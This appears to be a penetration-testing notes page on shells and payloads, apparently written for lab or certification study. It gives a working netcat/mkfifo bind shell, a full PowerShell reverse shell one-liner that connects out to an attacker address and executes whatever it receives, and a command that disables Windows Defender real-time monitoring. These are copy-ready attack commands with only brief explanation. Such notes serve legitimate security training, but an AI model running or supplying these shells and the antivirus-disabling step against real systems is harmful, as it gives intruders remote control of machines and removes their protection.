🥷
Penetration Testing Notes
Home
  • Notes
  • Port Scanning
  • Credential-less Enumeration
    • Secure Shell
    • Simple Mail Transfer Protocol
    • File Transfer Protocol
    • Domain Name Service
    • Hypertext Transfer Protocol
    • Internet Message Access Protocol / Post Office Protocol
    • Kerberos
    • Remote Procedure Call
    • Server Message Block
    • Simple Network Management Protocol
    • Lightweight Directory Access Protocol
    • Netlogon Remote Protocol
    • Network File Share
    • Remote Desktop Protocol
    • My Structured Query Language
    • Microsoft Structured Query Language
    • Oracle Transparent Network Substrate
    • Intelligent Platform Management Interface
    • Rsync
    • R-Services
    • Remote Desktop Protocol
    • Windows Remote Management
    • Windows Management Instrumentation
  • Credentialed Enumeration
    • Secure Shell
    • Server Message Block
    • Lightweight Directory Access Protocol
    • Kerberos
    • MSSQL
    • Windows Remote Management
  • Privilege Escalation
    • Linux
    • Windows
  • Windows Active Directory
    • Abuse Weak Access Control Lists (ACLs)
    • Overpass The Hash
    • Object Scoping
    • Pass The Ticket
  • Miscellaneous
    • File Transfers
    • Shells & Payloads
    • Metasploit Framework
    • Password Mutations
  • All Notes
Powered by GitBook
On this page
  • Bind Shells
  • Basic Bind Shell with Netcat
  • Server - Binding a Bash shell to the TCP session
  • Client - Connecting to bind shell on target
  • Reverse Shells
  • Simple Reverse Shell in Windows
  • Server (attack box)
  • Client (target)
  • Disable AV
  1. Miscellaneous

Shells & Payloads

PreviousFile TransfersNextMetasploit Framework

Last updated 1 year ago

Bind Shells

Basic Bind Shell with Netcat

Server - Binding a Bash shell to the TCP session

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

Client - Connecting to bind shell on target

nc -nv 10.129.41.200 7777

Reverse Shells

Simple Reverse Shell in Windows

Server (attack box)

sudo nc -lvnp 443

Client (target)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Disable AV

Set-MpPreference -DisableRealtimeMonitoring $true
With a bind shell, the target system has a listener started and awaits a connection from a pentester's system (attack box).
With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection.
Windows Defender antivirus (AV) software stopped the execution of the code.
To disable the antivirus through the Virus & threat protection settings or by using this command in an administrative PowerShell console. Once AV is disabled, attempt to execute the code again.